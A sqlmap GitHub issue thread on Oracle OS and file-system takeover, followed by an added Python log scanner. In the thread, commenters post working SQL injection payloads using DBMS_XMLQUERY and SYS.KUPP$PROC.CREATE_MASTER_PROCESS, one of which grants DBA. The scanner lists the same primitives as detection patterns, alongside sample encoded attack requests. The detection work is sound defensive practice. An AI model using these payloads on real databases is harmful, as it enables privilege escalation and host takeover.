
File and operating system takeover support for Oracle

Open bdamele opened this issue 13 years ago • 8 comments

Add support to takeover the file system when the back-end DBMS is Oracle.

References:

  • http://delicious.com/inquis/oracle

bdamele avatar Jun 26 '12 15:06 bdamele

We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3

infodox avatar Jul 03 '12 16:07 infodox

@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and bruteforce your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.

infodox avatar Jul 05 '12 19:07 infodox

More details: http://kitkatsatonthemat.blogspot.com/2011/11/i-herd-you-like-oracle-dawg-so-i-put.html

bdamele avatar Jul 06 '12 16:07 bdamele

Maybe this helps: in Oracle there are two functions granted to PUBLIC by default: dbms_xmlquery.newcontext() and dbms_xmlquery.getxml().

These two functions allow execution of anonymous PL/SQL blocks within an SQL statement. Extremely helpful when injecting into Oracle databases. Examples: select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

With this technique it would be possible to create a Java package with Runtime.exec() to take over the database host (the user needs the rights (grants) for this operation, but this can be checked via the Oracle system tables).

firefart avatar Aug 30 '12 10:08 firefart

@infodox where's your pull request? :)

bdamele avatar Dec 05 '12 00:12 bdamele

http://www.6code.net/2015/08/execute-os-command-in-oracle-database.html

stamparm avatar Oct 19 '15 09:10 stamparm

Bump

steelbrain avatar Jul 28 '16 13:07 steelbrain

There seem to be a few methods to execute OS commands, including through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.

For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--

I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.

I came across this whitepaper that goes into a lot more detail, including privilege escalation. I hope it might be helpful. https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf

SebaNuss avatar Apr 12 '18 12:04 SebaNuss
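The two comments above (firefart's DBMS_XMLQUERY functions and SebaNuss's KUPP$PROC.CREATE_MASTER_PROCESS) describe the same primitive from a defender's point of view: a PUBLIC-callable function that runs an anonymous PL/SQL block from inside an ordinary SELECT, so a single injected expression is enough to reach DDL and grants. The script below is an added example and is not part of the issue thread or of sqlmap; it scans constructed access-log lines (the sample log and the `/item?id=` parameter are made up for the example) for those primitives after undoing URL encoding, and grades each hit so a SOC rule can treat the known functions as high severity and bare PL/SQL keywords as a weaker signal.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Primitives named in the thread: PUBLIC-callable functions that execute an
# anonymous PL/SQL block from inside a plain SELECT. Matching is done on the
# decoded, lower-cased request, so case and encoding tricks do not hide them.
ORACLE_EXEC_PRIMITIVES = (
    "dbms_xmlquery.newcontext",
    "dbms_xmlquery.getxml",
    "kupp$proc.create_master_process",
)
# Keywords any such payload needs; on their own they are only a medium signal.
PLSQL_MARKERS = ("execute immediate", "pragma autonomous_transaction")

# Request target from a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')


def normalize(raw: str) -> str:
    """URL-decode twice (undoes double encoding), collapse whitespace, lower-case."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()


def classify(request: str) -> Optional[dict]:
    """Return a finding for one request target, or None when nothing matches."""
    norm = normalize(request)
    prims = [p for p in ORACLE_EXEC_PRIMITIVES if p in norm]
    markers = [m for m in PLSQL_MARKERS if m in norm]
    if prims:
        severity = "high"     # a known PL/SQL execution primitive is present
    elif markers:
        severity = "medium"   # PL/SQL keywords without a known primitive
    else:
        return None
    return {"severity": severity, "primitives": prims,
            "markers": markers, "request": request}


def scan_log(lines) -> list:
    """Apply classify() to every log line; findings carry the 1-based line number."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hit = classify(m.group(1))
        if hit:
            hit["line"] = no
            findings.append(hit)
    return findings


# Constructed sample log (not real traffic). Line 2 carries the DBMS_XMLQUERY
# pattern with a harmless block, line 3 the KUPP$PROC pattern double URL-encoded,
# line 4 only a PL/SQL keyword, line 1 is a normal request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2018:12:00:00 +0000] "GET /item?id=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2018:12:00:03 +0000] "GET /item?id=2%27%20and%20(select%20'
    'dbms_xmlquery.newcontext(%27declare%20pragma%20autonomous_transaction%3B%20begin%20'
    'null%3B%20end%3B%27)%20from%20dual)%20is%20not%20null-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2018:12:00:07 +0000] "GET /item?id=2%2527%2520and%2520(select%2520'
    'sys.kupp%2524proc.create_master_process(%2527execute%2520immediate%2520%2527)%2520'
    'from%2520dual)%2520is%2520not%2520null-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2018:12:00:09 +0000] "GET /item?id=2%27%20and%201%3D1%20--%20'
    'execute%20immediate HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']} primitives={f['primitives']} markers={f['markers']}")
```

The double decode in `normalize()` matters: the KUPP$PROC line is encoded as `%2524` for `$`, which a single decode would leave as `%24` and miss. Pair this with a check of who actually holds EXECUTE on those packages in the database (the thread notes the grants can be read from the system views), since a web-tier rule only tells you an attempt was made, not whether it could succeed.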